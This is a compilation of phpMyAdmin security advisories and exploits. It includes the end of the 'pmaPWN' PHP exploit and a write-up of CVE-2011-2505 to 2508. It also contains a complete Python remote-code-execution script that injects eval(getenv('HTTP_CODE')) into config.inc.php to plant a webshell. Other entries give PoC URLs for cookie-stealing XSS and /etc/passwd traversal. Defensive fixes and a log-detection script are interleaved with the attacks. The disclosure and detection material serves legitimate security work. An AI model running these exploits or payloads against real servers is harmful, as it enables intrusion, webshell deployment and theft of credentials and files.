        print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
        fwrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
        fwrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
    } else {
        print "\n[!] Shit! no luck.. not vulnerable\n";
        fwrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
        fclose($Handlex);
        return false;
    }
    fclose($Handlex);
    if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
    //exit();
}
?>
pmaPWN phpMyAdmin code injection remote command execution scanner and exploit.
Emanuele Gentili/phpMyAdmin Client Side Code Injection ( na)
PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification
Credits:
Emanuele 'emgent' Gentili <emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia <scox@backtrack.it>
In error.php, phpMyAdmin permits inserting text and a restricted set of tags, similar to BBCode.
With the tag [a@url@page]Click Me[/a], you can insert a link to your own page and redirect all users there.
Available tags are:
'[i]' => '<em>',
'[/i]' => '</em>',
'[em]' => '<em>',
'[/em]' => '</em>',
'[b]' => '<strong>',
'[/b]' => '</strong>',
'[strong]' => '<strong>',
'[/strong]' => '</strong>',
'[tt]' => '<code>',
'[/tt]' => '</code>',
'[code]' => '<code>',
'[/code]' => '</code>',
'[kbd]' => '<kbd>',
'[/kbd]' => '</kbd>',
'[br]' => '<br />',
'[/a]' => '</a>',
'[sup]' => '<sup>',
'[/sup]' => '</sup>',
and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '<a href="\1" target="\2">'
POC:
http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]
OWASP Reference:
http://www.owasp.org/index.php/Unvalidated_Input
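Rendering the restricted tag set listed above while refusing the link falsification the PoC shows, as an added example that is not phpMyAdmin's or the authors' code. The allow rule (relative path only, target limited to _self/_blank) and the function names are assumptions.

```php
<?php
// Added example (not phpMyAdmin's code): a defensive renderer for the
// [tag] markup used by error.php.

// A link is kept only when it is a relative path inside the application:
// no scheme ("http:", "javascript:", ...), no leading "/" or "//host",
// no parent-directory components, and a harmless window target.
function isAllowedErrorLink($url, $target)
{
    if ($url === '' || $url[0] === '/' || preg_match('#^[A-Za-z][A-Za-z0-9+.\-]*:#', $url)) {
        return false;
    }
    if (strpos($url, '..') !== false) {
        return false;
    }
    return in_array($target, array('_self', '_blank'), true);
}

function renderErrorMessage($message)
{
    // Escape first, so literal "<" and quotes in the message are inert and
    // only the tags translated below ever produce markup.
    $safe = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');

    // Subset of the replacement table from the advisory above.
    $tags = array(
        '[i]'  => '<em>',     '[/i]'  => '</em>',
        '[b]'  => '<strong>', '[/b]'  => '</strong>',
        '[code]' => '<code>', '[/code]' => '</code>',
        '[br]' => '<br />',
        '[/a]' => '</a>',   // an orphaned </a> from a dropped link is harmless
    );
    $safe = strtr($safe, $tags);

    // Same pattern as the original, but the anchor is only emitted after
    // validation; a rejected link is left visible as text.
    return preg_replace_callback(
        '/\[a@([^"@]*)@([^\]"]*)\]/',
        function ($m) {
            return isAllowedErrorLink($m[1], $m[2])
                ? '<a href="' . $m[1] . '" target="' . $m[2] . '">'
                : '[link removed]';
        },
        $safe
    );
}

// Constructed inputs: an internal link is kept; the external link from the
// PoC above and a scheme injection are both dropped, and raw HTML is escaped.
echo renderErrorMessage('See [a@./Documentation.html@_blank]the docs[/a][br]'), "\n";
echo renderErrorMessage('[a@http://www.tigersecurity.it@_self]This Is a Link[/a]'), "\n";
echo renderErrorMessage('[a@javascript:alert(1)@_self]x[/a] <b>raw</b>'), "\n";
```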
phpMyAdmin suffers from client side code injection and redirect link falsification vulnerabilities.
Inj3ct0r/phpMyAdmin 2.6.1 Disclosure ( na)
=================================== phpMyAdmin <= 2.6.1 disclosure ways ===================================
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Site Production: www.phpmyadmin.net
Product: phpMyAdmin 2.6.1
Version: 2.6.1
disclosure ways:
http://localhost/Tools/phpMyAdmin/tbl_properties.php?lang[]=ru-win1251
http://localhost/Tools/phpMyAdmin/tbl_properties.php?server[]=1
http://localhost/Tools/phpMyAdmin/tbl_properties.php?collation_connection[]=cp1251_general_ci
http://localhost/Tools/phpMyAdmin/tbl_properties.php?db[]=aaa&table=aaa
http://localhost/Tools/phpMyAdmin/sql.php?sql_query[]=
http://localhost/Tools/phpMyAdmin/server_export.php?convcharset[]=iso-8859-1
ThE End =]
Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
phpMyAdmin version 2.6.1 suffers from information disclosure vulnerabilities.
ghostblup/phpMyAdmin For Windows 2.5.9 XSS ( na)
^ ~~~~~~~~~~~~~ Indonesia ~~~~~~~~~~^
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^
^~~~~~~~~~phpmyadmin for windows 2.5.9~~~~~~~~~^
Author : ghostblup
Date : 02-09-09
Location : Palembang, Indonesia
Blog : http://ghostblup.blogspot.com
Where : Cross-site scripting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications. It allows code injection by a malicious
web page and theft of sessions/cookies.
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpMyAdmin for Windows
version : 2.5.9
Vendor : http://www.appservnetwork.com/
Download : http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Critical Cross-site scripting (XSS).
The appservlang variable in index.php is not filtered, which allows XSS
/ cross-site scripting.
Poc/Exploit:
~~~~~~~~~
http://localhost/index.php?appservlang=>"><ScRiPt%20%0a%0d>alert(112233)%3B</ScRiPt>
http://localhost/index.php?appservlang=>"><script>alert(document.cookie);</script>
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ My Love : Ratih Permata Sari
~ My friends : Amy,suset,revi,uwix^_^, Blackgirl ,
jasakreativkomputer, cyberlau , Vldaz
~ My inspiration : K-159 , y3dips,az001,Hero
~ ngetem community, sayap community , echo.or.id , PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork
---------------------------------------------------------------------------
Contact:
~~~~~~
ghostblup@gmail.com
My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~
phpMyAdmin for Windows version 2.5.9 suffers from a cross site scripting vulnerability.
Mango/phpMyAdmin 3.x Remote Code Execution ( na)
phpMyAdmin 3.x Multiple Remote Code Executions
This post details a few interesting vulnerabilities I found while relaxing and reading the source code of phpMyAdmin. My original advisory can be found here.
If you would like me to audit your PHP project, check out Xxor's PHP code auditing service.
The first vulnerability
File: libraries/auth/swekey/swekey.auth.lib.php
Lines: 266-276
Patched in: 3.3.10.2 and 3.4.3.1
Type: Variable Manipulation
Assigned CVE id: CVE-2011-2505
PMA Announcement-ID: PMASA-2011-5
266 if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false)
267 {
268 parse_str($_SERVER['QUERY_STRING']);
269 session_write_close();
270 session_id($session_to_unset);
271 session_start();
272 $_SESSION = array();
273 session_write_close();
274 session_destroy();
275 exit;
276 }
Notice the call to parse_str on line 268 that passes the query string as its first argument. It is missing a second argument. This means that whatever parameters and values are present in the query string will be used as variables in the current namespace. But since the code path that executes the call to parse_str inevitably leads to a call to exit, there isn't much to exploit directly. However, the session variables persist between requests, thus giving us full control of the $_SESSION array.
From here on there are numerous XSS and SQL injection vulnerabilities open for attack. But we'll focus on three far more serious vulnerabilities.
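The session_to_unset handler from swekey.auth.lib.php rewritten so that the query string cannot create or overwrite variables, plus a crude source audit for the single-argument parse_str pattern. This is an added example, not phpMyAdmin's code; the function names and the session id length bounds are assumptions.

```php
<?php
// Added example (not phpMyAdmin's code): the fix for the first
// vulnerability above, and a quick way to find the same construct elsewhere.

// Returns the validated session id to destroy, or false when the request
// is not acceptable. The session calls themselves are left as comments.
function sessionIdToUnset($queryString)
{
    // parse_str() with a result array: nothing is written into the local
    // scope, so keys such as _SESSION[...] in the query are only entries
    // of $params here and never touch the real $_SESSION.
    $params = array();
    parse_str($queryString, $params);

    if (!isset($params['session_to_unset']) || !is_string($params['session_to_unset'])) {
        return false;
    }
    $sid = $params['session_to_unset'];

    // Accept only the character set PHP uses for its own session ids
    // (letters, digits, comma, dash); the length bounds are an assumption.
    if (!preg_match('/^[A-Za-z0-9,\-]{22,128}$/', $sid)) {
        return false;
    }
    // session_write_close(); session_id($sid); session_start();
    // $_SESSION = array(); session_write_close(); session_destroy();
    return $sid;
}

// Audit helper: line numbers of parse_str() calls that pass no result
// array, i.e. the construct on line 268 above. Regex-based, so it is a
// first pass over a code base, not a parser.
function findSingleArgParseStr($phpSource)
{
    $hits = array();
    if (preg_match_all('/parse_str\s*\(\s*[^,()]+\)/', $phpSource, $m, PREG_OFFSET_CAPTURE)) {
        foreach ($m[0] as $match) {
            // newlines before the match offset, plus one, give the line number
            $hits[] = substr_count(substr($phpSource, 0, $match[1]), "\n") + 1;
        }
    }
    return $hits;
}

// Constructed inputs: a legitimate request and a query string shaped like
// the injection described above (nested _SESSION keys). The hostile one is
// rejected by the id check, and its _SESSION keys stay inside $params.
$legit   = 'session_to_unset=0123456789abcdef0123456789abcdef';
$hostile = 'session_to_unset=HelloThere&_SESSION[ConfigFile][Servers][x]=y';
var_dump(sessionIdToUnset($legit));
var_dump(sessionIdToUnset($hostile));

// Constructed snippet modelled on lines 266-269 above; the call sits on
// line 3 of this string.
$snippet = "if (strstr(\$_SERVER['QUERY_STRING'],'session_to_unset') != false)\n"
         . "{\n"
         . "    parse_str(\$_SERVER['QUERY_STRING']);\n"
         . "    session_write_close();\n";
print_r(findSingleArgParseStr($snippet));
```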
The second vulnerability
Patched in: 3.3.10.2 and 3.4.3.1
Type: Remote Static Code Injection
Assigned CVE id: CVE-2011-2506
PMA Announcement-ID: PMASA-2011-6
File: setup/lib/ConfigGenerator.class.php
Lines: 16-78
16 /**
17 * Creates config file
18 *
19 * @return string
20 */
21 public static function getConfigFile()
22 {
23 $cf = ConfigFile::getInstance();
24
25 $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? "\r\n" : "\n";
26 $c = $cf->getConfig();
27
28 // header
29 $ret = '<?php' . $crlf
30 . '/*' . $crlf
31 . ' * Generated configuration file' . $crlf
32 . ' * Generated by: phpMyAdmin '
33 . $GLOBALS['PMA_Config']->get('PMA_VERSION')
34 . ' setup script' . $crlf
35 . ' * Date: ' . date(DATE_RFC1123) . $crlf
36 . ' */' . $crlf . $crlf;
37
38 // servers
39 if ($cf->getServerCount() > 0) {
40 $ret .= "/* Servers configuration */$crlf\$i = 0;" . $crlf . $crlf;
41 foreach ($c['Servers'] as $id => $server) {
42 $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf
43 . '$i++;' . $crlf;
44 foreach ($server as $k => $v) {
45 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
46 $ret .= "\$cfg['Servers'][\$i]['$k'] = "
47 . (is_array($v) && self::_isZeroBasedArray($v)
48 ? self::_exportZeroBasedArray($v, $crlf)
49 : var_export($v, true))
50 . ';' . $crlf;
51 }
52 $ret .= $crlf;
53 }
54 $ret .= '/* End of servers configuration */' . $crlf . $crlf;
55 }
56 unset($c['Servers']);
57
58 // other settings
59 $persistKeys = $cf->getPersistKeysMap();
60
61 foreach ($c as $k => $v) {
62 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
63 $ret .= self::_getVarExport($k, $v, $crlf);
64 if (isset($persistKeys[$k])) {
65 unset($persistKeys[$k]);
66 }
67 }
68 // keep 1d array keys which are present in $persist_keys (config.values.php)
69 foreach (array_keys($persistKeys) as $k) {
70 if (strpos($k, '/') === false) {
71 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
72 $ret .= self::_getVarExport($k, $cf->getDefault($k), $crlf);
73 }
74 }
75 $ret .= '?>';
76
77 return $ret;
78 }
On line 42 in this file a comment is created to show some additional information in a config file. We can see that the output of the call to $cf->getServerName($id) is sanitized to prevent user input from closing the comment. However $id, the key of the $c['Servers'] array, is not. So if we could rename a key in this array we could close the comment and inject arbitrary PHP code.
On line 26 the $c array is created from a call to $cf->getConfig().
File: libraries/config/ConfigFile.class.php
Lines: 469-482
469 /**
470 * Returns configuration array (full, multidimensional format)
471 *
472 * @return array
473 */
474 public function getConfig()
475 {
476 $c = $_SESSION[$this->id];
477 foreach ($this->cfgUpdateReadMapping as $map_to => $map_from) {
478 PMA_array_write($map_to, $c, PMA_array_read($map_from, $c));
479 PMA_array_remove($map_from, $c);
480 }
481 return $c;
482 }
Bingo! The $c array is derived from the $_SESSION array, hence we could have full control of its contents by utilizing the first vulnerability. Now we can inject arbitrary PHP code that will be saved into the file config/config.inc.php. Then we would just browse to this file and the webserver would execute it.
This vulnerability requires one specific condition: the config directory must have been left in place after the initial configuration. This is advised against, and hence a majority of servers won't be susceptible to this attack. Therefore we'll check out a third and a fourth vulnerability.
The third vulnerability
Patched in: 3.3.10.2 and 3.4.3.1
Type: Authenticated Remote Code Execution
Assigned CVE id: CVE-2011-2507
PMA Announcement-ID: PMASA-2011-7
File: server_synchronize.php
Line: 466
466 $trg_db = $_SESSION['trg_db'];
Line: 477
477 $uncommon_tables = $_SESSION['uncommon_tables'];
Line: 674
674 PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, $uncommon_tables, $uncommon_table_structure_diff[$s], $uncommon_tables_fields, false);
File: libraries/server_synchronize.lib.php
Lines: 613-631
613 function PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, &$uncommon_tables, $table_index, &$uncommon_tables_fields, $display)
614 {
615 if (isset($uncommon_tables[$table_index])) {
616 $fields_result = PMA_DBI_get_fields($src_db, $uncommon_tables[$table_index], $src_link);
617 $fields = array();
618 foreach ($fields_result as $each_field) {
619 $field_name = $each_field['Field'];
620 $fields[] = $field_name;
621 }
622 $uncommon_tables_fields[$table_index] = $fields;
623
624 $Create_Query = PMA_DBI_fetch_value("SHOW CREATE TABLE " . PMA_backquote($src_db) . '.' . PMA_backquote($uncommon_tables[$table_index]), 0, 1, $src_link);
625
626 // Replace the src table name with a `dbname`.`tablename`
627 $Create_Table_Query = preg_replace('/' . PMA_backquote($uncommon_tables[$table_index]) . '/',
628 PMA_backquote($trg_db) . '.' .PMA_backquote($uncommon_tables[$table_index]),
629 $Create_Query,
630 $limit = 1
631 );
The variables $uncommon_tables[$table_index] and $trg_db are derived from the $_SESSION array. By utilizing the first vulnerability we can inject whatever we want into both the first and the second argument of the function preg_replace on lines 627-631. In a previous post to this blog I've detailed how this condition can be turned into remote code execution. Basically we can inject the "e" modifier into the regexp pattern, which causes the second argument to be executed as PHP code.
This vulnerability has two major restrictions from an attacker's perspective. First, the Suhosin patch completely defends against this type of attack. Second, this piece of code can only be reached if we're authenticated. So to exploit it we would need prior knowledge of credentials for an account of the database that phpMyAdmin is set up to manage, except for some obscure configurations that allow us to bypass this restriction.
Since the Suhosin patch is pretty popular, and for example compiled by default in OpenBSD's PHP packages, it's worth exploring a fourth vulnerability.
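The table-name rewrite from lines 627-631 above, done so that data derived from the request or the session can never change the pattern, as an added example (not phpMyAdmin's code; the function names are assumptions). The "e" modifier itself was deprecated in PHP 5.5 and removed in PHP 7.0, but the pattern-injection shape is worth recognising regardless.

```php
<?php
// Added example (not phpMyAdmin's code): a safe version of the
// preg_replace() call discussed above, and a regex-free alternative.

// Quote an identifier the way the backquote helper does (backticks, with
// embedded backticks doubled).
function backquote($name)
{
    return '`' . str_replace('`', '``', $name) . '`';
}

// Replace the first occurrence of `table` with `trg_db`.`table` in a
// SHOW CREATE TABLE statement. preg_quote() with the delimiter escapes every
// metacharacter including "/", so a table name cannot terminate the pattern
// and append modifiers.
function rewriteCreateTable($createQuery, $srcTable, $trgDb)
{
    $quotedSrc = backquote($srcTable);
    $pattern   = '/' . preg_quote($quotedSrc, '/') . '/';
    // The replacement is literal text as well: backslashes and "$" are
    // escaped so "$1"-style references cannot be smuggled in through it.
    $replacement = addcslashes(backquote($trgDb) . '.' . $quotedSrc, '\\$');
    return preg_replace($pattern, $replacement, $createQuery, 1);
}

// The same thing without a regex, the simpler choice when the needle is
// plain text: there are no quoting rules left to get wrong.
function rewriteCreateTableLiteral($createQuery, $srcTable, $trgDb)
{
    $quotedSrc = backquote($srcTable);
    $pos = strpos($createQuery, $quotedSrc);
    if ($pos === false) {
        return $createQuery;
    }
    return substr_replace($createQuery, backquote($trgDb) . '.' . $quotedSrc, $pos, strlen($quotedSrc));
}

// Constructed input: a table name containing "/" which, used unquoted as in
// the original, would end the pattern early and leave "e`/" as modifiers.
$create = "CREATE TABLE `t/e` (\n  `id` int(11) NOT NULL\n) ENGINE=InnoDB";
echo rewriteCreateTable($create, 't/e', 'target'), "\n";
echo rewriteCreateTableLiteral($create, 't/e', 'target'), "\n";
```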
The fourth vulnerability
Patched in: 3.3.10.2 and 3.4.3.1
Type: Path Traversal
Assigned CVE id: CVE-2011-2508
PMA Announcement-ID: PMASA-2011-8
File: libraries/display_tbl.lib.php
Lines: 1291-1299
1291 if ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME']) {
1292
1293 if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) && isset($GLOBALS['mime_map'][$meta->name]['transformation']) && !empty($GLOBALS['mime_map'][$meta->name]['transformation'])) {
1294 $include_file = $GLOBALS['mime_map'][$meta->name]['transformation'];
1295
1296 if (file_exists('./libraries/transformations/' . $include_file)) {
1297 $transformfunction_name = str_replace('.inc.php', '', $GLOBALS['mime_map'][$meta->name]['transformation']);
1298
1299 require_once './libraries/transformations/' . $include_file;
This fourth vulnerability is a directory traversal in a call to require_once which can be exploited as a local file inclusion. The variable $GLOBALS['mime_map'][$meta->name]['transformation'] is derived from user input. For example, by setting $GLOBALS['mime_map'][$meta->name]['transformation'] to "../../../../../../etc/passwd" the local passwd-file could show up.
This vulnerability can only be reached if we're authenticated, and it requires that the transformation feature is set up correctly in phpMyAdmin's configuration storage. However, the $GLOBALS['cfgRelation'] array is derived from the $_SESSION array. Hence the variable $GLOBALS['cfgRelation']['mimework'] used to check this can be modified using the first vulnerability.
File: libraries/display_tbl.lib.php
Lines: 707-710
707 if ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'] && ! $_SESSION['tmp_user_values']['hide_transformation']) {
708 require_once './libraries/transformations.lib.php';
709 $GLOBALS['mime_map'] = PMA_getMIME($db, $table);
710 }
And the fact that $GLOBALS['mime_map'] is conditionally initialized, together with the fact that phpMyAdmin registers all request variables in the global namespace (it blacklists some, but not mime_map), allows us to set $GLOBALS['mime_map'][$meta->name]['transformation'] to whatever we want, even when the transformation feature is not set up correctly.
Summary
If the config folder is left in place, phpMyAdmin is vulnerable.
If an attacker has access to database credentials and the Suhosin patch is not installed, phpMyAdmin is vulnerable.
If an attacker has access to database credentials and knows how to exploit a local file inclusion, phpMyAdmin is vulnerable.
phpMyAdmin version 3.x suffers from multiple remote code execution vulnerabilities.
Oriol Torrent Santiago/phpMyAdmin262XSS.txt ( na)
==========================================================
Title: phpMyAdmin Cross-site Scripting Vulnerability
Application: phpMyAdmin
Vendor: http://www.phpmyadmin.net
Vulnerable Versions: <=2.6.2-beta1
Corrected: phpMyAdmin versions after 2.6.2-beta1
Bug: Cross-site Scripting
Date: 3-Apr-2005
Author: Oriol Torrent Santiago < oriol.torrent@gmail.com >
References:
http://www.arrelnet.com/advisories/adv20050403.html
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-3
==========================================================
1) Background
-----------
phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in 47 languages.
2) Problem description
--------------------
phpMyAdmin <=2.6.2-beta1 contains a vulnerability caused by missing validation of input supplied to the "convcharset" variable. This can be exploited to execute arbitrary HTML and script code (JavaScript, VBScript, etc.) in a user's browser session in the context of a vulnerable site. It allows an attacker to compromise the phpMyAdmin account, steal cookies, etc.
Ex1: http://host/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>
Ex2: http://host/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>
3) Solution:
---------
The vendor was contacted on the 29th of March 2005 and a new version has been released. Download the latest version of phpMyAdmin.
4) Timeline
--------
29/03/2005 Bug discovered
29/03/2005 Vendor notified
29/03/2005 Vendor response and bug fixed
03/04/2005 New version released
03/04/2005 Advisory released
phpMyAdmin versions 2.6.2-beta1 and below are susceptible to cross site scripting attacks.
wofeiwo/phpMyAdmin3 Remote Code Execution ( na)
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. A "config" directory must exist and be writeable in the pma directory.
#               2. session.auto_start = 1 in the php.ini configuration.
import os,sys,urllib2,re

def usage(program):
    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit"
    print "Usage: %s <PMA_url>" % program
    print "Example: %s http://www.test.com/phpMyAdmin" % program
    sys.exit(0)

def main(args):
    try:
        if len(args) < 2:
            usage(args[0])
        if args[1][-1] == "/":
            args[1] = args[1][:-1]
        # Step 1: fetch the form token and session id (the session id is the same value as the phpMyAdmin cookie)
        print "[+] Trying get form token&session_id.."
        content = urllib2.urlopen(args[1]+"/index.php").read()
        r1 = re.findall("token=(\w{32})", content)
        r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
        if not r1:
            r1 = re.findall("token\" value=\"(\w{32})\"", content)
        if not r2:
            r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
        if len(r1) < 1 or len(r2) < 1:
            print "[-] Cannot find form token and session id...exit."
            sys.exit(-1)
        token = r1[0]
        sessionid = r2[0]
        print "[+] Token: %s , SessionID: %s" % (token, sessionid)
        # Step 2: set $_SESSION values through swekey.auth.lib.php
        print "[+] Trying to insert payload in $_SESSION.."
        uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
        url = args[1]+uri
        opener = urllib2.build_opener()
        opener.addheaders.append(('Cookie', 'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid)))
        urllib2.install_opener(opener)
        urllib2.urlopen(url)
        # Step 3: use the setup script to write the shell
        print "[+] Trying get webshell.."
        postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token)
        url = args[1]+"/setup/config.php"
        # print "[+]Postdata: %s" % postdata
        urllib2.urlopen(url, postdata)
        print "[+] All done, pray for your lucky!"
        # Step 4: connect to the shell and test it
        url = args[1]+"/config/config.inc.php"
        opener.addheaders.append(('Code', 'phpinfo();'))
        urllib2.install_opener(opener)
        print "[+] Trying connect shell: %s" % url
        result = re.findall("System \</td\>\<td class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
        if len(result) == 1:
            print "[+] Lucky u! System info: %s" % result[0]
            print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
        else:
            print "[-] Cannot get webshell."
    except Exception, e:
        print e

if __name__ == "__main__" : main(sys.argv)
Remote code execution exploit for phpMyAdmin versions below 3.3.10.2 and 3.4.3.1.
Cedric Cochin/phpMyAdmin255pl1.txt ( na)
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
################################################################################
Summary :
phpMyAdmin is a tool written in PHP intended to handle the administration of
MySQL over the WWW. There is a vulnerability in the current stable version of
phpMyAdmin that allows an attacker to retrieve arbitrary files from the
webserver with the privileges of the webserver.
################################################################################
Details :
The export PHP script can be exploited to disclose arbitrary files using a
PHP include() call.
Vulnerable Systems:
* phpMyAdmin 2.5.5-pl1 and prior
Release Date :
February 2, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - Arbitrary File Disclosure
(HIGH Risk)
File impacted : export.php
// What type of export are we doing?
if ($what == 'excel') {
    $type = 'csv';
} else {
    $type = $what;
}

/**
 * Defines the url to return to in case of error in a sql statement
 */
require('./libraries/export/' . $type . '.php');
Exploit example:
-- HTTP Request --
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
-- HTTP Request --
The vulnerability is exploitable even if PHP register_globals is set to off.
################################################################################
Vendor Status :
The information has been provided to the phpMyAdmin Project Managers.
A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
--> http://www.phpmyadmin.net/home_page/
--> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
< cco@netvigilance.com >
phpMyAdmin versions 2.5.5-pl1 and below do not properly sanitize variables resulting in them being susceptible to a directory traversal attack.
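Added example, not part of any advisory above: detection logic for the three request patterns these entries describe (the convcharset reflected XSS, the PMA3 swekey/setup RCE chain, and the export.php traversal), run over constructed Apache-style access-log lines. The IPs, timestamps, sizes and the "/pma/" install path are made up for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote

# Constructed combined-log lines (hosts, times and sizes are invented); the
# requests mirror the three advisories above, plus one benign export.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2011:10:00:02 +0000] "GET /pma/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=x&_SESSION[ConfigFile][Servers][1][host]=a HTTP/1.1" 200 0
10.0.0.5 - - [08/Jul/2011:10:00:03 +0000] "POST /pma/setup/config.php HTTP/1.1" 200 300
10.0.0.5 - - [08/Jul/2011:10:00:04 +0000] "GET /pma/config/config.inc.php HTTP/1.1" 200 9000
10.0.0.9 - - [02/Feb/2004:11:00:00 +0000] "GET /pma/export.php?what=../../../../etc/passwd%00 HTTP/1.1" 200 1200
10.0.0.9 - - [03/Apr/2005:12:00:00 +0000] "GET /pma/index.php?convcharset=%22%3E%3Ch1%3EXSS%3C/h1%3E HTTP/1.1" 200 2000
10.0.0.7 - - [08/Jul/2011:10:07:00 +0000] "GET /pma/export.php?what=sql&db=test HTTP/1.1" 200 4000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) ')

def classify_request(method, url):
    """Return the indicator tags a single request matches (empty list if none)."""
    path, _, query = url.partition("?")
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes the values
    tags = []
    # CVE-2011-2505: $_SESSION injection through the swekey auth helper.
    if path.endswith("/libraries/auth/swekey/swekey.auth.lib.php") and "_SESSION[" in unquote(query):
        tags.append("session-injection")
    # Rest of the PMA3 chain: write the config, then fetch the planted file.
    if method == "POST" and path.endswith("/setup/config.php"):
        tags.append("setup-config-write")
    if path.endswith("/config/config.inc.php"):
        tags.append("config-file-fetch")
    # phpMyAdmin 2.5.5-pl1 export.php: the type must be a bare module name.
    for what in params.get("what", []):
        if ".." in what or "/" in what or "\x00" in what:
            tags.append("export-traversal")
    # PMASA-2005-3: markup characters in the reflected convcharset value.
    for value in params.get("convcharset", []):
        if re.search(r'[<>"\']', value):
            tags.append("convcharset-xss")
    return tags

def scan_log(text):
    """Tag every request and add one finding per IP that completes the RCE chain."""
    findings, seen = [], defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["method"], m["url"])
        findings.extend((m["ip"], tag) for tag in tags)
        seen[m["ip"]].update(tags)
    chain = {"session-injection", "setup-config-write", "config-file-fetch"}
    findings.extend((ip, "pma3-rce-chain") for ip, tags in seen.items() if chain <= tags)
    return findings
```

A request for config/config.inc.php is flagged on its own because the "config" directory that the PMA3 exploit relies on should never be reachable through the web server.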